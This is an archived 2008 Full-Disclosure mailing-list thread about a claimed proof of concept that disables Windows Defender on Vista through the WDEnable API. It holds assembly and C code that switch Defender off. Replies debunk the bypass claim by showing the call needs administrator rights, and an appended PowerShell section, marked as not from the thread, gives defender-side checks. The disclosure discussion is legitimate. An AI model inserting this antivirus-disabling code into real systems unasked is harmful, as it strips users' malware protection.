
Mailing List Archive: Full Disclosure: Full-Disclosure

[Wired Security/EOF] Disable Windows Defender (Vista) PoC code



skyout.fd at wired-security

May 14, 2008, 9:05 AM

Post #1 of 3 (348 views)
[Wired Security/EOF] Disable Windows Defender (Vista) PoC code

Hey guys,

my friend Izee from the EOF-Project(.net) team has coded a
simple PoC that demonstrates how to disable Windows
Defender on Vista (tested with and without SPs on x86/x64)
using the API made for it.

The API has the following structure:

--- SNIP ---
HRESULT WDEnable(
BOOL fEnable
);
---

Something about the parameter(s):

--- SNIP ---
Parameters

fEnable
[in] Windows Defender status that the calling
application wants to set. TRUE enables Windows
Defender. FALSE disables Windows Defender.
---

Now the interesting thing: what Microsoft says about the security
of this API:

--- SNIP ---
Remarks

The application calling this function must run with
administrator permissions on the local computer. In
Windows Vista, the user is prompted for administrator
permission when the application is running with lower
privileges. Windows Defender also validates proper signing
of the calling process (and all the loaded modules) before
allowing the calling application to change the status. If the
calling process image (or any loaded modules) is not signed
or is flagged as a threat by the Windows Defender signature,
then the call fails with the appropriate error code.
---

And here is the code from Izee/EOF that shows that this is a lie and nothing
more. The users get fooled...

--- SNIP ---
; MASM x64. WDEnable is exported by MpClient.dll; the call only succeeds
; when the process is already running with administrator privileges.
extrn LoadLibraryA :proc
extrn GetProcAddress :proc
extrn ExitProcess :proc

.data

l db '\Program Files\Windows Defender\MpClient',0
p db 'WDEnable',0

.code

eof proc
sub rsp, 28h ;32 bytes of shadow space plus 8 to keep rsp 16-byte aligned

lea rcx, l ;path is relative to the root of the current drive
call LoadLibraryA
test rax, rax
jz done ;MpClient.dll not found

lea rdx, p
mov rcx, rax
call GetProcAddress
test rax, rax
jz done ;export not found

xor rcx, rcx ;Turn Windows Defender off (WDEnable(FALSE))
call rax

done:
xor rcx, rcx ;exit code 0
call ExitProcess

eof endp
end
---

News: http://wired-security.net/archive/2008/may/index.php#07_2_052008

Sincerely,
SkyOut/Wired Security in cooperation with Izee/EOF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


peter.ferrie at gmail

May 14, 2008, 1:49 PM

Post #2 of 3 (329 views)
Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code [In reply to]

> my friend Izee from the EOF-Project(.net) team has coded a
> simple PoC code, that demonstrates how to disable the Windows
> Defender on Vista (tested with and without SPs on x86/x64)
> using its own API made for it.

Does he realise that he must be Admin first?
Then he can just disable the service, or delete the files, or whatever.
Using the API doesn't gain much here.



fdiggle at gmail

May 14, 2008, 9:10 PM

Post #3 of 3 (316 views)
Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code [In reply to]

HAHAHA Fredrick Diggle thinks that skyout was running his el8 assembly
machine program in a debugger running as administrator :( oops...

for the kids to test at home fred diggle has written an easier program
which isn't as el8 (fred doesn't know the computer assembly language
as he is a lowly zoo worker) but also isn't as dumb

#include <windows.h>
#define INFINITY_PLUS_1 0 // important DO NOT CHANGE
/*
by defining the diggle license agreement secret sauce
you are agreeing that fredrick diggle is far better
than you will ever be and also that you will give him
all your money please
(build with -DDIGGLE_LICENSE_AGREEMENT or the typedef below is never seen)
*/
#ifdef DIGGLE_LICENSE_AGREEMENT
/* WDEnable is documented as HRESULT WINAPI WDEnable(BOOL fEnable) */
typedef HRESULT (WINAPI *diggle)(BOOL hippo);
#endif
int main(void) {
    HMODULE dlliggle;
    diggle WDEnable;
    HRESULT hr;
    /* LoadLibraryW: the L"" literal is a wide string, so call the W variant
       explicitly instead of depending on UNICODE being defined */
    dlliggle = LoadLibraryW(L"C:\\Program Files\\Windows Defender\\MPClient.dll");
    if (dlliggle == NULL) {
        return (int) GetLastError(); // MPClient.dll not found
    }
    WDEnable = (diggle) GetProcAddress(dlliggle, "WDEnable");
    if (WDEnable == NULL) {
        FreeLibrary(dlliggle);
        return (int) GetLastError(); // export not found
    }
    /* FALSE asks the service to disable Defender; fails unless the caller
       is admin (see the IsAdminOrSystem check below) */
    hr = WDEnable((BOOL) INFINITY_PLUS_1);
    FreeLibrary(dlliggle);
    return SUCCEEDED(hr) ? INFINITY_PLUS_1 : 1; // <- THIS IS CRITICAL
}

doesn't work if fred is not admin :( <- sad face

Why could this be when skyout says it will?!?!?!?!

from MPClient.dll

WDEnable()
...
.text:30C12858 loc_30C12858:                 ; CODE XREF: WDEnable(x)+16Ej
.text:30C12858 call _MpFeatureDisable@8      ; This is teh call that Matters ++++++
...

MpFeatureDisable()
...
.text:30C0C8A9 lea eax, [ebp+var_4]
.text:30C0C8AC push eax                      ; int
.text:30C0C8AD push ebx                      ; int
.text:30C0C8AE call _IsAdminOrSystem@8       ; IsAdminOrSystem(x,x) Oops :((((((((
...

so Fredrick thought in Fred's mind, well gee golly this checks if fred
is an admin but I can control this code eh (disclaimer: fred is not
canadian)... so what happens if fred makes this code do "mov DWORD PTR
SS:[EBP-4], 1" instead of that nasty admin checking?

well fred discovered that it basically calls into NdrClientCall2()
which can be viewed for pleasure here ->
http://msdn.microsoft.com/en-us/library/aa374215(VS.85).aspx

see ----v

ClientMpDisableFeature()
...
.text:30C14FBA lea eax, [ebp+arg_0]
.text:30C14FBD push eax
.text:30C14FBE push offset byte_30C01AFE     ; pFormat
.text:30C14FC3 push offset pStubDescriptor   ; pStubDescriptor
.text:30C14FC8 call _NdrClientCall2          <- HELLo you devilish monkey
...


and although fred did not reverse this nastiness today he assures skyout that

1) MPClient.dll checks for admin privs (not that it matters)
2) even if it didn't this call wouldn't let you turn off defender
without admin privs, if you want to find a way start ^--- there
3) his children will be plentiful with full heads of hair (but one
might potentially be a midget... :D)

Fred diggle must go see if the hippo brushed his teeth before going to bed now

good bye friends!

On Wed, May 14, 2008 at 3:49 PM, Peter Ferrie <peter.ferrie[at]gmail.com> wrote:
>> my friend Izee from the EOF-Project(.net) team has coded a
>> simple PoC code, that demonstrates how to disable the Windows
>> Defender on Vista (tested with and without SPs on x86/x64)
>> using its own API made for it.
>
> Does he realise that he must be Admin first?
> Then he he can just disable the service, or delete the files, or whatever.
> Using the API doesn't gain much here.

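An added example, not from the thread: the defender-side checks that follow from Fred's analysis. Because WDEnable only succeeds from an elevated process (the IsAdminOrSystem check) and the actual disable is performed by the WinDefend service over RPC, the useful monitoring signals are the service state and the Defender event log. It assumes PowerShell 2.0 or later and the event IDs 5001 (real-time protection disabled) and 5010 (scanning disabled), which should be verified against the build being monitored.

```powershell
# Added example (not from the thread): defender-side checks for the
# behaviour discussed above. Requires PowerShell 2.0+ (Vista/7 or later).

function Test-IsElevated {
    # The same question MpClient.dll's IsAdminOrSystem asks before
    # WDEnable is allowed to proceed.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-DefenderServiceState {
    # WinDefend is the service that owns the on/off state; WDEnable
    # only asks it over RPC to change that state.
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    if ($null -eq $svc) { return 'NotInstalled' }
    return $svc.Status.ToString()
}

function Get-DefenderDisableEvents {
    param([int]$Hours = 24)
    # Assumed event IDs (verify on your build): 5001 = real-time
    # protection disabled, 5010 = malware scanning disabled.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5010
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

Write-Host ("Running elevated:  {0}" -f (Test-IsElevated))
Write-Host ("WinDefend service: {0}" -f (Get-DefenderServiceState))

$events = @(Get-DefenderDisableEvents -Hours 24)
if ($events.Count -gt 0) {
    # Any such event came from an elevated caller, so it is worth a look.
    Write-Warning ("{0} Defender disable event(s) in the last 24h" -f $events.Count)
    $events | Format-Table -AutoSize
} else {
    Write-Host "No Defender disable events in the last 24h"
}
```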
